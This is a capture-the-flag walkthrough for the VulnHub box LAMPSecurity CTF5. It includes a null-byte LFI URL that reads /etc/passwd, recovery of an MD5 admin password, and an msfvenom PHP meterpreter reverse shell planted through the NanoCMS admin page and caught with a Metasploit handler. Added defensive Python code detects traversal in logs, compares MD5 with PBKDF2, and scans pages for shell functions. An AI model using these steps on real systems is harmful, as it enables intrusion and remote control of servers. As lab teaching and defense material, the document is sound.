Introduction
In this post you will learn how to solve LAMPSecurity CTF5. The video version of the post is below, so check it out.
Visit here to download the box: LAMPSecurity: CTF5 ~ VulnHub
Video
Solving LAMPSECURITY: CTF5
Just follow the steps below and I am sure that by the end of the post you will be able to clear the box. If you have any doubts, comment down below or watch the video.
Identifying IP address
To identify the IP address of the target I simply run arp-scan -l; you can also use the netdiscover command instead.
arp-scan -l
Information gathering using Nmap
I am doing a full port scan (-p-) with OS detection and service/version detection (-A).
nmap -A -p- <Target IP> -T4
nmap -A -p- 192.168.1.38 -T4
Save the results to a file and take note of the OS, the services, and which ports are open.
Going through the nmap output we can see that multiple ports are open, and my guess is that at least one of these services is vulnerable.
Let's copy the IP address of the target, paste it into a browser and see what we get.
Vulnerability analysis
Let's run nikto and check for vulnerabilities; you can also use OpenVAS or Nessus to find them.
We will be exploiting the /index.php error, because it indicates that local or remote file inclusion is possible.
The target machine is vulnerable to LFI/RFI.
Just copy the URL below and paste it into the browser, making sure you enter the correct target IP address.
http://192.168.1.38/index.php?page=../../../../../../../../../etc/passwd%00
We all know that /etc/passwd holds the system's user account entries, which is why we requested /etc/passwd.
Look what we got, hooray!
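The page parameter above is included straight into the PHP script, and the trailing %00 (NUL byte) cuts off whatever suffix the code appends, which is why ../../../../etc/passwd%00 works. The following is an added example (not code from the original post or from the CTF image) showing, in Python, the two things a defender wants for this bug class: a page resolver that rejects NUL bytes, only serves allowlisted names and confirms the resolved path stays inside the template directory, and a small detector that flags traversal and NUL-byte sequences in Apache combined-format access log lines. The base directory, the allowlist and the log lines are constructed for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed allowlist of the page names the application really has.
ALLOWED_PAGES = {"home", "about", "contact"}


def resolve_page(base_dir: str, page: str) -> Optional[str]:
    """Return the template path for `page`, or None when the request is unsafe.

    Models the fix for an include($_GET['page']) style bug:
    1. reject NUL bytes (the %00 trick that truncates an appended suffix),
    2. require an allowlisted page name, so '../' can never appear,
    3. confirm the resolved path is still under base_dir, even after symlinks.
    """
    if "\x00" in page:
        return None
    if page not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Apache combined log: client, ident, user, [time], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)
# Raw and URL-encoded traversal fragments plus the encoded NUL byte.
TRAVERSAL = re.compile(
    r"(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f|%00|%c0%ae)", re.IGNORECASE
)


def lfi_attempts(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, request_target) for every line whose target contains
    a traversal or NUL-byte sequence, checked both raw and after URL decoding."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("request").split(" ")
        if len(parts) < 2:
            continue
        target = parts[1]
        if TRAVERSAL.search(target) or TRAVERSAL.search(unquote(target)):
            hits.append((m.group("ip"), target))
    return hits


# Constructed sample log lines; the addresses mirror the ones used in the post.
SAMPLE_LOG = [
    '192.168.1.134 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.134 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.168.1.134 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=..%2f..%2fetc%2fpasswd HTTP/1.1" 404 0 "-" "curl/7.0"',
    '10.0.0.5 - - [10/Oct/2023:13:56:00 +0000] "GET /~andy/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(resolve_page("/srv/example-app/pages", "home"))
    print(resolve_page("/srv/example-app/pages", "../../../../etc/passwd\x00"))
    for ip, target in lfi_attempts(SAMPLE_LOG):
        print(f"possible LFI from {ip}: {target}")
```

The allowlist alone already stops traversal; the realpath check is kept so that the function stays safe even if someone later relaxes the allowlist to accept arbitrary names. The detector is deliberately loose (it will flag legitimate URLs that contain "../"), which is the right trade-off for a hunting query over a small web server's logs.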
I also found some redirects which are quite fishy, so I took a note of them. Just click on the Blog menu and you will be redirected to http://192.168.1.38/~andy/
I can see that the site is powered by NanoCMS. NanoCMS is an old PHP-based CMS which is now discontinued.
I searched Google for possible vulnerabilities and found this page: https://www.securityfocus.com/bid/34508/exploit
What it says is that the NanoCMS password hash is saved in /data/pagesdata.txt
So I opened http://192.168.1.38/~andy/data/pagesdata.txt
Crack the MD5 Password hash
If you take a look at the password hash, a wild guess is that it is MD5. So I went to the Ultimate Hashing and Anonymity toolkit (md5hashing.net) to decode the hash.
We have decoded the hash: the username is admin and the password is shannon.
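The reason an online service can "decode" this hash instantly is that NanoCMS stored a plain, unsalted MD5 of the password: the same password always yields the same digest, so a table built once from a wordlist answers every leaked hash. The following added example (not code from the original post or from NanoCMS) shows that lookup in Python beside what a salted, iterated password hash (PBKDF2-HMAC-SHA256) does instead. The wordlist is constructed for the example; the password value is the one recovered in the post.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

# Constructed wordlist standing in for the dictionaries that MD5 lookup
# services and cracking tools are built from.
WORDLIST = ["password", "123456", "letmein", "shannon", "admin", "qwerty"]

ITERATIONS = 200_000  # assumed work factor for the PBKDF2 example


def build_md5_table(words) -> Dict[str, str]:
    """Map md5(word) -> word. Unsalted MD5 is deterministic, so this table is
    computed once and reused against any number of leaked hashes."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def lookup_md5(hex_digest: str, table: Dict[str, str]) -> Optional[str]:
    """Recover the password for an unsalted MD5 digest, if it is in the table."""
    return table.get(hex_digest.lower())


def pbkdf2_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). A fresh random salt means two users with the same
    password get different digests, so no precomputed table applies."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def pbkdf2_verify(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def same_password_same_digest(password: str, hasher) -> bool:
    """True when hashing the password twice gives identical output, i.e. when
    the scheme is vulnerable to a precomputed lookup table."""
    return hasher(password) == hasher(password)


if __name__ == "__main__":
    table = build_md5_table(WORDLIST)
    leaked = hashlib.md5(b"shannon").hexdigest()  # what pagesdata.txt exposed
    print("unsalted md5 lookup:", lookup_md5(leaked, table))
    salt, digest = pbkdf2_hash("shannon")
    print("pbkdf2 verifies:", pbkdf2_verify("shannon", salt, digest))
    print("md5 deterministic:", same_password_same_digest(
        "shannon", lambda p: hashlib.md5(p.encode()).hexdigest()))
    print("pbkdf2 deterministic:", same_password_same_digest(
        "shannon", lambda p: pbkdf2_hash(p)[1]))
```

The salt does not need to be secret; it only needs to be unique per stored hash, and the iteration count is what makes guessing slow for everyone, including an attacker who has the file.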
Accessing as admin
Now go to this link and enter the username and password: http://192.168.1.38/~andy/data/nanoadmin.php
Creating a reverse PHP shell
Let's generate a reverse PHP shell. To generate it, enter the command below:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f raw
We have generated the reverse PHP shell.
Copy everything from <?php to die() and paste it into a new page.
Open the NanoCMS admin panel of the website, navigate to the New Page option and paste the reverse PHP shell into the Content section. Enter any name in the Title field and click on Add Page.
Catching the reverse PHP shell using msfconsole
Enter these commands to set up a handler for the PHP shell:
msfconsole
msf > use exploit/multi/handler
Set the payload now:
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
Now set the lhost and lport. The lhost is the IP address of your own listening machine, the same value used in the msfvenom command above:
msf exploit(handler) > set lhost 192.168.1.134
msf exploit(handler) > set lport 4444
Now let's run the handler:
msf exploit(handler) > run
On the other side, if you open the page you just created, the handler will receive the meterpreter session.
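What made this step possible is that NanoCMS treats page content entered by the admin as executable PHP rather than as data. From the defender's side, the two controls that matter are rendering stored content as escaped text and periodically scanning stored pages for PHP code that should never be there. The following is an added example (not code from the original post or from NanoCMS) in Python: a scanner that flags PHP open tags and functions a page body has no legitimate reason to call, and a renderer that HTML-escapes content so an embedded tag is displayed instead of executed. The sample pages, the placeholder host and the list of risky functions are constructed for the example.

```python
import html
import re
from typing import Dict, List

# A PHP open tag has no place in stored page content.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Functions commonly seen in web shells and reverse shells; constructed list.
RISKY_CALLS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
    r"fsockopen|base64_decode|create_function)\s*\(",
    re.IGNORECASE,
)


def scan_page_content(body: str) -> List[str]:
    """Return findings for one stored page body, in order of discovery."""
    findings = []
    if PHP_OPEN_TAG.search(body):
        findings.append("php-open-tag")
    for m in RISKY_CALLS.finditer(body):
        findings.append("risky-call:" + m.group(1).lower())
    return findings


def scan_pages(pages: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan every stored page; only pages with findings are returned."""
    report = {}
    for title, body in pages.items():
        findings = scan_page_content(body)
        if findings:
            report[title] = findings
    return report


def render_safe(body: str) -> str:
    """Render stored content as data: escaping turns '<?php' into '&lt;?php',
    so the server never interprets it, whatever the admin typed."""
    return html.escape(body)


# Constructed sample of a CMS page store: one normal page and one page whose
# body carries a PHP fragment (placeholder host, not a working payload).
SAMPLE_PAGES = {
    "About": "<h1>About</h1><p>Welcome to my blog.</p>",
    "New Page": '<p>hello</p>\n<?php /* constructed */ $sock = fsockopen("10.0.0.1", 4444); ?>',
}

if __name__ == "__main__":
    for title, findings in scan_pages(SAMPLE_PAGES).items():
        print(f"{title}: {', '.join(findings)}")
    print(render_safe("<?php echo 1; ?>"))
```

Run the scanner against the CMS data directory on a schedule, or from a file-integrity monitor hook, so that a page added through a stolen admin login is noticed quickly; the rendering fix removes the execution path altogether, which is the change that actually closes the hole.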
Conclusion
This CTF5 box was a little bit tougher than CTF4, but it was really fun, and there are manual exploits available too. Out of 10 I would rate the difficulty of the box at 5.5.